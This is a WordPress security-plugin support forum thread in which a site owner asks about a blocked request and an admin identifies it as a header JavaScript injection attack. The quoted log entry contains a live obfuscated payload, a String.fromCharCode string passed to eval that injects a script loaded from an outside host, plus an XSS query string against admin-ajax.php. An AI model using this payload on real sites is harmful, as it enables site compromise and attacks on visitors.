Interesting Item on Security Log

Home Forums BulletProof Security Pro Interesting Item on Security Log

This topic contains 2 replies, has 2 voices, and was last updated by  Mike 5 months ago.

Viewing 3 posts - 1 through 3 (of 3 total)
  • Author
    Posts
  • #37393

    Mike
    Participant

    I have been seeing this frequently in my security log – and it appears like a hack attempt – not sure what it is because I have not seen this in the past.   It appears BPS is doing it’s job – however is there a weakness this attempt is trying to exploit?

    [403 GET Request: May 21, 2019 - 9:53 am]
    BPS Pro: 13.9
    WP: 5.2
    Event Code: WPADMIN-SBR
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: 192.99.38.186
    Host Name: cp31-ca.under2.net
    SERVER_PROTOCOL: language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 118, 97, 114, 32, 115, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 115, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 10, 118, 97, 114, 32, 112, 108, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 49, 49, 53, 44, 32, 52, 54, 44, 32, 49, 48, 51, 44, 32, 57, 55, 44, 32, 49, 49, 52, 44, 32, 49, 49, 52, 44, 32, 49, 50, 49, 44, 32, 49, 48, 51, 44, 32, 49, 49, 55, 44, 32, 49, 48, 48, 44, 32, 49, 48, 53, 44, 32, 49, 49, 48, 44, 32, 49, 48, 53, 44, 32, 52, 54, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 41, 59, 10, 115, 46, 115, 114, 99, 61, 112, 108, 43, 39, 47, 102, 108, 97, 115, 107, 46, 106, 115, 63, 116, 61, 116, 38, 39, 59, 32, 10, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 32, 123, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 46, 112, 97, 114, 101, 110, 116, 78, 111, 100, 101, 46, 105, 110, 115, 101, 114, 116, 66, 101, 102, 111, 114, 101, 40, 115, 44, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 59, 10, 125, 32, 101, 108, 115, 101, 32, 123, 10, 100, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59, 10, 125));</script> HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-admin/admin-ajax.php?action=update_zb_fbc_code&domain=</script><script
    QUERY_STRING: action=update_zb_fbc_code&domain=</script><script
    HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
    
    
    #37394

    AITpro Admin
    Keymaster

    Yep, this is a Header javascript injection attack.  BPS logs everything in a plain text file for exactly this reason.  BPS does not save or store Security Log fields in your WordPress database for exactly this reason.  Nothing to worry about.

    #37395

    Mike
    Participant

    Thanks for the quick response. BPS has been great. I experience 200-600 attacks a week (logged) and it has been that way for several years – never had a breach. I wish these folks (or bots) had something better to do.

Viewing 3 posts - 1 through 3 (of 3 total)

You must be logged in to reply to this topic.